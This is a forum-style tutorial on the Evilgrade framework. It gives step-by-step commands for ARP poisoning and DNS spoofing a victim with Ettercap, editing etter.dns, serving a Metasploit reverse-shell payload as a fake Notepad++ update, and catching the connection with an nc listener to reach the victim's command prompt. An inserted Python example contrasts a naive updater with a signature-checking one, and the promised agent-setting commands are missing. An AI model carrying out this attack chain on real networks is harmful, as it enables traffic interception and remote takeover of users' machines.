
How To: Evilgrade

Today I'll explain how to use Evilgrade. Evilgrade is a modular framework that takes advantage of poorly implemented software update mechanisms: updaters that ask a fixed hostname whether a newer version exists, download whatever installer that host offers over plain HTTP, and run it without checking a signature. An attacker who controls the victim's name resolution (DNS spoofing, usually delivered through a MITM attack such as ARP poisoning) can therefore answer the update check himself and trick the victim computer into executing arbitrary code, such as a Metasploit payload. Currently the Evilgrade framework ships modules for the following software: Java plugin, WinZip, Winamp, MacOS, OpenOffice, iTunes, LinkedIn Toolbar, Download Accelerator, Notepad++ and Speedbit. In this tutorial I illustrate how to use Evilgrade together with a DNS spoofing attack to get a reverse shell on a target computer.
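To make "poorly implemented upgrade" concrete, here is an added example (my own Python model, not code from the original post and not part of Evilgrade) of both sides of an update check. A naive client does what the vulnerable updaters do: trust the manifest returned by whichever host the VirtualHost lookup lands on, download the binary and run it. A hardened client pins a verification key and refuses anything that does not verify. Assumptions: the version numbers, the installer and agent byte strings are constructed sample data, and HMAC-SHA256 with a shared key stands in for a real asymmetric signature (Ed25519 or RSA) so the example runs on the standard library alone; in a real scheme the client holds only the vendor's public key and cannot forge signatures.

```python
import hashlib
import hmac
import json

# Constructed sample data for the demo.  In a real scheme the vendor holds a
# private signing key and the client ships only the public key; HMAC with a
# shared key stands in here so the example needs nothing outside the stdlib.
VENDOR_KEY = b"vendor-signing-key-demo"
LEGIT_INSTALLER = b"MZ\x90\x00 ... genuine installer bytes (constructed)"
AGENT_BINARY = b"MZ\x90\x00 ... msfpayload reverse shell (constructed)"


def version_tuple(v):
    """'5.6.8' -> (5, 6, 8) so versions compare numerically, not as strings."""
    return tuple(int(x) for x in v.split("."))


def make_manifest(version, binary, key=None):
    """Manifest an update server returns for a version check.
    It is signed only when the vendor's key is supplied; Evilgrade has no such key."""
    manifest = {"version": version, "sha256": hashlib.sha256(binary).hexdigest()}
    if key is not None:
        body = json.dumps(manifest, sort_keys=True).encode()
        manifest["sig"] = hmac.new(key, body, hashlib.sha256).hexdigest()
    return manifest


class UpdateServer:
    """Whatever host the client's DNS lookup of the VirtualHost lands on."""

    def __init__(self, manifest, binary):
        self.manifest = manifest
        self.binary = binary

    def get_manifest(self):
        return dict(self.manifest)

    def get_binary(self):
        return self.binary


def naive_update(server, installed):
    """The pattern Evilgrade abuses: trust the manifest, download, execute."""
    m = server.get_manifest()
    if version_tuple(m["version"]) <= version_tuple(installed):
        return None                      # nothing newer offered
    return server.get_binary()           # would be written to disk and run


def hardened_update(server, installed, pinned_key):
    """Accept an update only if the manifest verifies under the pinned key
    and the downloaded binary matches the hash inside that signed manifest."""
    m = server.get_manifest()
    sig = m.pop("sig", None)
    if sig is None:
        raise ValueError("unsigned manifest")
    body = json.dumps(m, sort_keys=True).encode()
    expected = hmac.new(pinned_key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad manifest signature")
    if version_tuple(m["version"]) <= version_tuple(installed):
        return None
    binary = server.get_binary()
    if not hmac.compare_digest(hashlib.sha256(binary).hexdigest(), m["sha256"]):
        raise ValueError("binary does not match signed manifest")
    return binary


def run_scenarios(installed="5.6.0"):
    """Run both clients against the vendor, against Evilgrade, and against an
    attacker replaying the vendor's signed manifest with the binary swapped."""
    vendor = UpdateServer(make_manifest("5.6.8", LEGIT_INSTALLER, VENDOR_KEY), LEGIT_INSTALLER)
    # Evilgrade: advertise a high version so the update prompt appears, serve the agent.
    evilgrade = UpdateServer(make_manifest("9.9.9", AGENT_BINARY), AGENT_BINARY)
    # Replay: the vendor's genuine signed manifest, but the agent where the installer should be.
    replay = UpdateServer(make_manifest("5.6.8", LEGIT_INSTALLER, VENDOR_KEY), AGENT_BINARY)

    def outcome(fn, server):
        try:
            got = fn(server)
        except ValueError as e:
            return "rejected: " + str(e)
        return {None: "no update", LEGIT_INSTALLER: "ran installer", AGENT_BINARY: "ran agent"}[got]

    naive = lambda s: naive_update(s, installed)
    hard = lambda s: hardened_update(s, installed, VENDOR_KEY)
    return {
        "naive/vendor": outcome(naive, vendor),
        "naive/evilgrade": outcome(naive, evilgrade),
        "naive/replay": outcome(naive, replay),
        "hardened/vendor": outcome(hard, vendor),
        "hardened/evilgrade": outcome(hard, evilgrade),
        "hardened/replay": outcome(hard, replay),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name:20} {result}")
```

The naive client runs the agent in both attack cases, because it has no way to tell the vendor from the box that answered the DNS query. The hardened client rejects Evilgrade's manifest outright (no signature it can verify) and also catches the subtler case where a genuine signed manifest is replayed with a different binary behind it, because the hash is inside the signed data. That second check matters: signing only the version string would still let a spoofed host hand out any binary it likes.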

My target will be my Winblows XP machine using Notepad++ on my own network.

First you will need to download Evilgrade from:

Code:

www.infobyte.com.ar

Once you have downloaded the file you need to decompress it:

Code:

BT ~ / tar zxvf isr-evilgrade-1.0.0.tar.gz

Ok so navigate to the folder by:

Code:

BT ~ / cd isr-evilgrade

Now to start Evilgrade you type:

Code:

./evilgrade

Now that you're in Evilgrade, have a look at the modules, one per application whose updater can be spoofed. You can list them by typing:

Code:

show modules

As you can see there are a few you can spoof, but today I'll be using Notepad++.

OK, so you have picked your weapon... err, module. Now we have to configure that module. You can do this by typing:

Code:

config notepadplus

NOTE: If you're not using Notepad++, put the name of the module you would like to configure instead.

So now to see all the options for that module you type:

Code:

show options

At this point you can see all the options of that module. The two that matter are the VirtualHost, which is the update hostname the victim's application contacts (and therefore the name you will have to spoof in DNS), and the agent, which is the file Evilgrade hands out as the "update".

OK, so now we have gotten this far. Have I lost you? Good. The next step is choosing what payload to use as the agent.
Open a new shell and navigate to the Metasploit directory to list the payloads we can use:

Code:

BT ~ / cd /pentest/exploits/framework3
BT ~ / ./msfpayload -l

Now find the payload you wish to use and note its name.
I will be using windows/shell_reverse_tcp
So now we go back to the Evilgrade shell and set the agent, i.e. point the agent option at the payload binary that will be served as the update. To set the agent, follow the commands below:

NOTE: LHOST is your IP and LPORT is the port you want the payload to connect to.
When the victim runs the "update", the payload connects back to you on that address and port.

So now the payload and the update are all set. The next step is DNS spoofing: the victim's update check has to resolve the module's VirtualHost to your machine, where Evilgrade is listening, so some background knowledge of DNS spoofing helps here.
We do this with Ettercap's dns_spoof plugin, which takes its answers from the etter.dns file, so that file has to be edited first:

Code:

BT ~ / cd /usr/local/share/ettercap
BT ~ / nano etter.dns

Delete all the sample entries in the file that won't be used and add an A record that points the module's VirtualHost at your own IP. It should look like this after you are done. NOTE: Remember I'm using the Notepad++ module; the hostname will be different if you're using another module.
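The screenshot of the edited file didn't survive, so here is an added example of the shape it takes (my own illustration, not the original post's file). `update.example.com` is a placeholder for the VirtualHost that `show options` printed for your module, and `192.168.1.2` is a placeholder for the address of the machine running Evilgrade; substitute both.

```text
# etter.dns entry format:  name   record-type   address
# Point the module's VirtualHost, and any subdomain of it, at the box running Evilgrade.
update.example.com      A   192.168.1.2
*.update.example.com    A   192.168.1.2
```

Every hostname the updater touches has to be covered: if the module lists more than one VirtualHost, or the version check and the download come from different names, each needs its own A record. Conversely, any line left over from the stock file is also answered by the plugin once it is running, so leaving unrelated entries in place spoofs domains you did not intend to.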

Now we're going to start Ettercap. While still in the shell where you edited etter.dns, type the following:

Code:

ettercap -G

Now that we're in Ettercap we need to:
Sniff (eth0)
Scan for hosts
Set the targets: default gateway + target PC
Use a MITM attack: ARP poisoning
Go to Plugins and activate dns_spoof
Start sniffing

So now open another shell so we can listen on the port the payload will connect back to once the victim has downloaded and run the "update".
To listen on the port, type the following:

Code:

nc -l -v -p port

NOTE: The port number has to be the LPORT you set when building the module's agent.

Now go back to Evilgrade and type the following:

Code:

start

Now you have to wait for the victim to accept the update when they open the program your module is for. Once they install the "update", the shell where you started the listener receives the connection and you are in their CMD, with whatever privileges the user who ran the updater had.

I hope this has been of help in any way. If you have any suggestions for what I should add or change, please don't hesitate to send me a PM about it.